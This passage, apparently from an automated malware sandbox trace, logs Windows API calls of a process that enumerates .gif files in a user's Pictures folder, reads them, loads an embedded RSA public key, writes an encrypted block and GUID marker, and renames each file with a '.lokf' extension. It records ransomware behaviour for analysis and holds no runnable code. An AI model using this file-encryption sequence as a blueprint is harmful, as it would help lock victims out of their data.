(in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0060.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.014] GetCurrentThreadId () returned 0x9e0 [0060.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c85108 [0060.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.014] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.014] GetCurrentThreadId () returned 0x9e0 [0060.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.014] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.014] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x11ce4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.014] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.014] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0060.015] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.015] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.015] CloseHandle (hObject=0x5cc) returned 1 [0060.016] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\af7fMK0 C.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\af7fmk0 c.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\af7fMK0 C.gif.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\af7fmk0 c.gif.lokf")) returned 1 [0060.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.016] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.017] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228c60 | out: hHeap=0x660000) returned 1 [0060.017] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb395b20, ftCreationTime.dwHighDateTime=0x1d4c776, ftLastAccessTime.dwLowDateTime=0x4683c680, ftLastAccessTime.dwHighDateTime=0x1d4d48f, ftLastWriteTime.dwLowDateTime=0x4683c680, ftLastWriteTime.dwHighDateTime=0x1d4d48f, nFileSizeHigh=0x0, nFileSizeLow=0x5636, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AjNKcaGLMrNbgB.gif", cAlternateFileName="AJNKCA~1.GIF")) returned 1 [0060.017] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\AjNKcaGLMrNbgB.gif") returned=".gif" [0060.017] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\AjNKcaGLMrNbgB.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\ajnkcaglmrnbgb.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.017] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=22070) returned 1 [0060.017] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.020] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5610, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.020] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.021] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x5636, lpOverlapped=0x0) returned 1 [0060.021] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.021] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.021] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.021] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8588) returned 1 [0060.022] CryptCreateHash (in: hProv=0x6b8588, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.022] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.022] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.022] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.022] GetLastError () returned 0x0 [0060.022] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.022] CryptReleaseContext (hProv=0x6b8588, dwFlags=0x0) returned 1 [0060.022] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.022] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.022] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.022] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.022] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.022] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.022] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0060.022] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a88 | out: hHeap=0x660000) returned 1 [0060.022] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85aa0 | out: hHeap=0x660000) returned 1 [0060.022] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.022] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.022] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0060.022] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.022] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0060.022] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85aa0 [0060.022] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.022] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85a88 [0060.022] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0060.022] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.022] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.022] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.022] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.023] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.023] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0060.023] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.023] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.023] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85aa0 | out: hHeap=0x660000) returned 1 [0060.023] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.023] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a88 | out: hHeap=0x660000) returned 1 [0060.023] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.023] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.023] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.023] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.023] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0060.023] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.023] GetCurrentThreadId () returned 0x9e0 [0060.023] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.023] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c85198 [0060.023] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.023] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.023] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.023] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.023] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.023] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0060.023] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.023] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.023] GetCurrentThreadId () returned 0x9e0 [0060.023] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.023] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.023] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0060.023] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.023] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.023] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.023] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.023] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.023] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.024] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.024] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.024] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.024] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0060.024] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.024] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.024] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.024] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.024] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0060.024] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0060.024] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0060.024] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.024] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.024] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.024] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85a88 [0060.024] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.024] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0060.024] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.024] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.024] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0060.024] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0060.024] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0060.024] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85aa0 [0060.024] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0060.024] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.024] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0060.024] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85a70 [0060.024] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0060.024] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0060.024] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.024] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0060.024] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.024] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.024] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.024] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0060.024] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85ab8 [0060.025] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0060.025] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0060.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0060.025] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0060.025] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0060.025] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a88 | out: hHeap=0x660000) returned 1 [0060.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85a88 [0060.025] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0060.025] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0060.025] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0060.025] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0060.025] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0060.025] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a88 | out: hHeap=0x660000) returned 1 [0060.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0060.025] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0060.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0060.025] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.025] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.025] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0060.025] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fa10 | out: hHeap=0x660000) returned 1 [0060.025] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0060.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0060.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0060.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ab8 | out: hHeap=0x660000) returned 1 [0060.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85aa0 | out: hHeap=0x660000) returned 1 [0060.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a70 | out: hHeap=0x660000) returned 1 [0060.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0060.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0060.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0060.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a58 | out: hHeap=0x660000) returned 1 [0060.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c888c8 | out: hHeap=0x660000) returned 1 [0060.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0060.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0060.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0060.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0060.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.026] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5636, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.026] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.026] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.026] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.027] CloseHandle (hObject=0x5cc) returned 1 [0060.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262b28 [0060.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0060.027] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\AjNKcaGLMrNbgB.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\ajnkcaglmrnbgb.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\AjNKcaGLMrNbgB.gif.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\ajnkcaglmrnbgb.gif.lokf")) returned 1 [0060.029] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c4f5440, ftCreationTime.dwHighDateTime=0x1d4cfb5, ftLastAccessTime.dwLowDateTime=0xfbbc1990, ftLastAccessTime.dwHighDateTime=0x1d4c6f6, ftLastWriteTime.dwLowDateTime=0xfbbc1990, ftLastWriteTime.dwHighDateTime=0x1d4c6f6, nFileSizeHigh=0x0, nFileSizeLow=0x13464, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="f0kq4mu0SkEws8GQakO.gif", cAlternateFileName="F0KQ4M~1.GIF")) returned 1 [0060.029] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.029] RtlAllocateHeap (HeapHandle=0x660000, 